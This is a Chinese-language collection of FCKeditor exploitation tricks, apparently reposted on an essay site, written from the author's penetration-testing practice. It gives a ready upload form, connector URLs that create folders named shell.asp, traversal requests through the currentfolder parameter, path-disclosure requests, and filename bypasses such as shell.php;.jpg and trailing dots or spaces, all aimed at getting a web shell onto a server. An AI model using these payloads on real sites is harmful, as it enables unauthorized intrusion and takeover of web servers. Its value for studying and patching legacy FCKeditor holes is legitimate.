Fckeditor漏洞利用总结
查看编辑器版本
fckeditor/_whatsnew.html
—————————————————————————————————————————————————————————————
2. version 2.2 版本
apache+linux 环境下在上传文件后面加个.突破!测试通过。
—————————————————————————————————————————————————————————————
3.version <=2.4.2 for php 在处理php 上传的地方并未对media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
<form enctype="multipart/form-data"
action="http://www.site.com/fckeditor/editor/filemanager/upload/php/upload.php?type=media" method="post">upload a new file:<br>
<input type="file" name="newfile" size="50"><br>
<input type="submit" value="upload">
</form>
—————————————————————————————————————————————————————————————
4.fckeditor 文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版fck 的变化。
4.1:提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
—————————————————————————————————————————————————————————————
5. 突破建立文件夹
fckeditor/editor/filemanager/connectors/asp/connector.asp?command=createfolder&type=image¤tfolder=%2fshell.asp&newfoldername=z&uuid=1244789975684
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?command=createfolder¤tfolder=/&type=image&newfoldername=shell.asp
—————————————————————————————————————————————————————————————
6. fckeditor 中test 文件的上传地址
fckeditor/editor/filemanager/browser/default/connectors/test.html
fckeditor/editor/filemanager/upload/test.html
fckeditor/editor/filemanager/connectors/test.html
fckeditor/editor/filemanager/connectors/uploadtest.html
—————————————————————————————————————————————————————————————
7.常用上传地址
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?command=getfoldersandfiles&type=image¤tfolder=/
fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/asp/connector.asp
fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=http://www.site.com%2ffckeditor%2feditor%2ffilemanager%2fconnectors%2fphp%2fconnector.php (ver:2.6.3 测试通过)
jsp 版:
fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/jsp/connector.jsp
注意红色部分修改为fckeditor 实际使用的脚本语言,蓝色部分可以自定义文
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
—————————————————————————————————————————————————————————————
8.其他上传地址
fckeditor/_samples/default.html
fckeditor/_samples/asp/sample01.asp
fckeditor/_samples/asp/sample02.asp
fckeditor/_samples/asp/sample03.asp
fckeditor/_samples/asp/sample04.asp
一般很多站点都已删除_samples 目录,可以试试。
fckeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
—————————————————————————————————————————————————————————————
9.列目录漏洞也可助找上传地址
version 2.4.1 测试通过
修改currentfolder 参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?command=createfolder&type=image¤tfolder=../../..%2f&newfoldername=shell.asp
根据返回的xml 信息可以查看网站所有的目录。
fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?command=getfoldersandfiles&type=image¤tfolder=%2f
也可以直接浏览盘符:
jsp 版本:
fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?command=getfoldersandfiles&type=¤tfolder=%2f
—————————————————————————————————————————————————————————————
10.爆路径漏洞
fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?command=getfoldersandfiles&type=file¤tfolder=/shell.asp
—————————————————————————————————————————————————————————————
11. fckeditor 被动限制策略所导致的过滤不严问题
影响版本: fckeditor x.x <= fckeditor v2.4.3
脆弱描述:
fckeditor v2.4.3 中file 类别默认拒绝上传类型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sfilepath = $sserverdir . $sfilename,而没有使用$sextension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
而在apache 下,因为"apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义type 变量时使用file 类别来上传文件,根据fckeditor 的代码,其限制最为狭隘。
在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用XX 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
—————————————————————————————————————————————————————————————
12.最古老的漏洞,type文件没有限制!
我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=image 改成type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
—————————————————————————————————————————————————————————————
以上方法都是网上收集和在平时渗透中所总结的经验,可能有些有遗漏,当再想起的时候再补充,也有自己没发现的就要靠各位大侠分享学习了!
Fckeditor漏洞利用总结相关文章:
Fckeditor漏洞利用总结
上一篇:车间工作总结范文
下一篇:暑期实践个人心得:开工啦